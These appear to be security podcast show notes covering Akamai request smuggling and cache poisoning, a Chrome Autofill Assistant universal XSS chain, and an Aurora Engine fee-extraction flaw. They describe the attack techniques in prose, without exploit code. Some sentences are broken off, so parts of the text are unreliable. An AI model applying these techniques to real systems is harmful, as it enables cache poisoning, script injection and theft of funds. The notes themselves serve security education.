155 - Akamai Cache Poisoning and a Chrome Universal XSS
This seemed to mostly be an exercise in attack surface discovery, scanning the files used by Iconics they found support for
What happens when you tell a server to treat the
Content-Length header as a hop-by-hop header and remove it? Request smuggling.
Hop-by-hop headers are those headers that are designed to be processed by the server currently handling the request, and not make their way to the final application server. This is useful for say a reverse proxy that might perform authentication and then pass some auth info along to the next service. You can tell the server what headers should be stripped from the request using the
Connection: Content-Length as a header, Akamai would indeed strip the
Content-Length header and not pass it on. Leading to the next server (The Akami server that routes the requests to their real destination) reading the body as a new request. They demonstrate this with both a
OPTIONS request, interestingly though they don’t demonstrate it with a
POST, and do not comment on it.
As request smuggling here on its own isn’t the most useful, the attack was weaponized as a cache poisoning attack. As the response to their smuggled request would be treated as the response to the next request they could obtain regional cache poisoning by making the caching server believe the response was the legitimate response, basically giving them control over the cached response to any Akamai hosted page.
The Autofill Assistant has a chain of issues that could be abused for universal XSS in the context of an arbitrary website.
The first challenge is that the Autofill Assistant intent should only be launched from trusted, Google controlled sources. The problem is that the
isGoogleReferrer check only actually checks if the main frame of the tab navigating to the Autofill Assitant intent hosts a
https://google.com and then using the handle to that page to navigate it to the intent URI. This could also be bypassed using HTTP redirects and placing a link to an attacker controlled location that responds with an HTTP redirect to the intent on some Google page.
Once able to launch the intent, there are a number of potentially interesting parameters.
tl;dr Force others to pay you a fee for giving them a worthless token.
The Aurora Engine is an EVM running on the NEAR blockchain. The idea being to allow developers who write EVM smart contracts to deploy them on NEAR. To accommodate this there are also some functions exposed for transfer tokens between NEAR and the EVM. The problem specific arises in
ft_on_transfer which is used to transfer a NEP-141 (NEAR) token for the equivalent in ERC20 (EVM). This function allows the sender to specify a fee that should be provided to the message relayer.
What this means is an attacker can mine a NEP-141 token that is basically worthless, create a mapping between that NEP-141 and some ERC20 token, and then transfer the token away to a victim (transferring tokens does not require the consent of the recipient). In transfering the token, they will specify a high fee that should be paid to the relayer (the attacker) and Aurora will send them their fee.